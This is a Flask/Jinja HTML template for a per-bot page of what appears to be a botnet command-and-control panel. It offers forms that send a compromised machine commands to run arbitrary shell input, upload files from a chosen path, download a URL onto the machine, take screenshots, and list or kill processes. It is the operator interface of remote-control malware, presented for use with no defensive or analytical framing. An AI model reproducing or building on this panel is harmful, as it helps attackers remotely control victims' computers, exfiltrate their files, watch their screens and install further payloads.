{% extends 'base.html' %}

{% block title %}
Bot {{ id }}
{% endblock %}

{% block content %}
    <h1>Bot {{ id }}</h1>
    <div>
        {% for data in bot_data %}
            <p> {{ data }} </p>
        {% endfor %}
        <a href= {{url_for('proclist', id = id)}}>View Process List</a><br>
        <a href= {{url_for('networkaddresses', id = id)}}>View Network Address List</a><br>
        <a href= {{url_for('commandoutput', id = id)}}>View Command Output</a><br>
    </div>

    <div>
        <form action="/action/info" method="POST" id="info">
        <input type="hidden" name="id" value="{{ id }}">
        </form>

        <form action="/action/ps" method="POST" id="ps">
        <input type="hidden" name="id" value="{{ id }}">
        </form>

        <form action="/action/clear" method="POST" id="clear">
        <input type="hidden" name="id" value="{{ id }}">
        </form>

        <form action="/action/ss" method="POST" id="ss">
        <input type="hidden" name="id" value="{{ id }}">
        </form>

        <div class="btn-group">
            <button type="submit" form="info" value="Submit">Update Info</button>
            <button type="submit" form="ps" value="Submit">Update Process List</button>
            <button type="submit" form="clear" value="Submit">Clear command queue</button>
            <button type="submit" form="ss" value="Submit">Screenshot</button>
        </div>
    </div>



    <div>
        <form action="/action/run" method="POST" id="run">
        <label for="cmd">Command:</label>
        <input type="text" id="cmd" name="cmd"><br><br>
        <input type="hidden" name="id" value="{{ id }}">
        </form>
        <button type="submit" form="run" value="Submit">Run</button>
    </div>
    <div>
        <form action="/action/upload" method="POST" id="upload">
        <label for="cmd">Path:</label>
        <input type="text" id="path" name="path"><br><br>
        <input type="hidden" name="id" value="{{ id }}">
        </form>
        <button type="submit" form="upload" value="Submit">Upload</button>
    </div>
    <div>
        <form action="/action/download" method="POST" id="download">
        <label for="url">URL:</label>
        <input type="text" id="url" name="url">
        <label for="filepath">File Path:</label>
        <input type="text" id="filepath" name="filepath"><br><br>
        <input type="hidden" name="id" value="{{ id }}">
        </form>
        <button type="submit" form="download" value="Submit">Download</button>
    </div>
    <div>
        <form action="/action/kill" method="POST" id="kill">
        <label for="cmd">Process ID:</label>
        <input type="text" id="pid" name="pid"><br><br>
        <input type="hidden" name="id" value="{{ id }}">
        </form>
        <button type="submit" form="kill" value="Submit">Kill</button>
    </div>
{% endblock %}